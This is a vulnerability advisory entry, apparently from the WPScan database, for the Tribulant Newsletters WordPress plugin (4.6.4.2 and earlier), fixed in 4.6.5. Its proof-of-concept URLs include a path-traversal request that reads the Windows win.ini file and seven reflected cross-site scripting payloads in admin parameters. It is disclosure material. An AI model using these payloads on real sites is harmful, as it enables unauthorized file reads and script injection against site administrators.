Tribulant Newsletters <= 4.6.4.2 – Multiple Vulnerabilities

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
3.1 File disclosure
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWIN
DOWS%5cwin.ini

3.2 Cross-Site Scripting
Vulnerable Parameter: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=checkexpired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.3 Cross-Site Scripting
Vulnerable Parameter: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterssubscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note:
Subscriber id (parameter "id") must exist. Value 1 is a good guess for start ;)

3.4 Cross-Site Scripting
Vulnerable Parameter: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterslists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.5 Cross-Site Scripting
Vulnerable Parameter: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/adminajax.php?action=newsletters_gauge&value=1});alert(1);</script>

3.6 Cross-Site Scripting
Vulnerable Parameter: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://www.defensecode.com/advisories.php

3.7 Cross-Site Scripting
Vulnerable Parameter: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.8 Cross-Site Scripting
Vulnerable Parameter: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletterssubscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Affects Plugin

fixed in version 4.6.5

References

URL http://defensecode.com/advisories/DC-2017-01-012_WordPress_Tribulant_Newsletters_Plugin_Advisory.pdf

Classification

Type MULTI

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode/
Views 124
Verified No
WPVDB ID 8839

Timeline

Publicly Published 2017-05-31 (7 months ago)
Added 2017-06-01 (7 months ago)
Last Updated 2017-06-01 (7 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.